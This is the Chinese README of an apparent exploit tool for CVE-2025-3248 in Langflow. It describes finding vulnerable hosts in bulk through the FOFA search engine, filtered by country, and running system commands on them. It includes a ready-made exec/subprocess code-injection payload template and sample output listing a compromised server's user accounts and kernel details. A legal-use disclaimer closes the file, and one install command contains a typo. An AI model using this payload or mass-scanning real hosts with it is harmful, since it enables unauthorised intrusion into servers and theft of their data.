[English](./README.md) | 中文

# Langflow 漏洞扫描器

用于扫描 Langflow 应用中 CVE-2025-3248 漏洞的工具。

## 功能特点

- 支持单目标扫描或使用 FOFA 批量扫描
- 在存在漏洞的目标上执行系统命令
- 获取系统信息
- 支持自定义 payload
- FOFA 扫描进度条显示
- 美观的命令行界面

## 安装方法

1. 克隆仓库：
```bash
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
```

2. 安装依赖：
```bash
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
```

3. 配置.ENV文件（可选）
```bash
# 编辑过之后执行：
mv .env.example .env
```


## 使用方法

### 单目标扫描

```bash
python main.py -t https://target.com
```

### 使用 FOFA API

```bash
python main.py --fofa-email your@email.com --fofa-key your_api_key
```

### 其他选项

- `-t, --target`: 要扫描的目标 URL
- `--fofa-email`: FOFA API 邮箱
- `--fofa-key`: FOFA API 密钥
- `--fofa-query`: FOFA 搜索语句（默认：'app="LOGSPACE-LangFlow"'）
- `--country`: 按国家代码过滤结果（如：CN, US）
- `--max-pages`: 获取的 FOFA 最大页数（默认：5）
- `--page-size`: 每页结果数（默认：100）
- `--timeout`: 请求超时时间（秒）（默认：10）
- `--no-verify`: 禁用 SSL 验证
- `--threads`: 并发扫描的线程数（默认：5）
- `-f, --file`: 自定义 Python 文件作为 payload

## 自定义 Payload

你可以创建一个 Python 文件作为自定义 payload：

```python
def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
    pass
```

然后这样使用：
```bash
python main.py -t https://target.com -f your_payload.py
```


## 输出案例
```bash
    [+] User Accounts:
        root            UID:0      GID:0      Home:/root                Shell:/bin/bash
        daemon          UID:1      GID:1      Home:/usr/sbin            Shell:/usr/sbin/nologin
        bin             UID:2      GID:2      Home:/bin                 Shell:/usr/sbin/nologin
        sys             UID:3      GID:3      Home:/dev                 Shell:/usr/sbin/nologin
        sync            UID:4      GID:65534  Home:/bin                 Shell:/bin/sync
        games           UID:5      GID:60     Home:/usr/games           Shell:/usr/sbin/nologin
        man             UID:6      GID:12     Home:/var/cache/man       Shell:/usr/sbin/nologin
        lp              UID:7      GID:7      Home:/var/spool/lpd       Shell:/usr/sbin/nologin
        mail            UID:8      GID:8      Home:/var/mail            Shell:/usr/sbin/nologin
        news            UID:9      GID:9      Home:/var/spool/news      Shell:/usr/sbin/nologin
        uucp            UID:10     GID:10     Home:/var/spool/uucp      Shell:/usr/sbin/nologin
        proxy           UID:13     GID:13     Home:/bin                 Shell:/usr/sbin/nologin
        www-data        UID:33     GID:33     Home:/var/www             Shell:/usr/sbin/nologin
        backup          UID:34     GID:34     Home:/var/backups         Shell:/usr/sbin/nologin
        list            UID:38     GID:38     Home:/var/list            Shell:/usr/sbin/nologin
        irc             UID:39     GID:39     Home:/run/ircd            Shell:/usr/sbin/nologin
        _apt            UID:42     GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        nobody          UID:65534  GID:65534  Home:/nonexistent         Shell:/usr/sbin/nologin
        user            UID:1000   GID:0      Home:/app/data            Shell:/bin/sh
```

```bash
    [+] System Details:
        Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux
```

## 免责声明

⚠️ 免责声明
本工具仅供合法用途。它设计用于教育目的、企业内部安全测试或已获得授权的环境中使用。严禁将本工具用于任何未授权的系统、网络或设备，否则可能触犯相关法律法规。

使用者应对其行为承担全部法律责任。作者及贡献者不对因本工具使用不当而造成的任何损失、数据泄露或法律后果负责。

⚠️ 请勿用于非法攻击。请勿尝试在非授权系统上部署或运行此工具。


## 许可证

[MIT](./LICENSE) 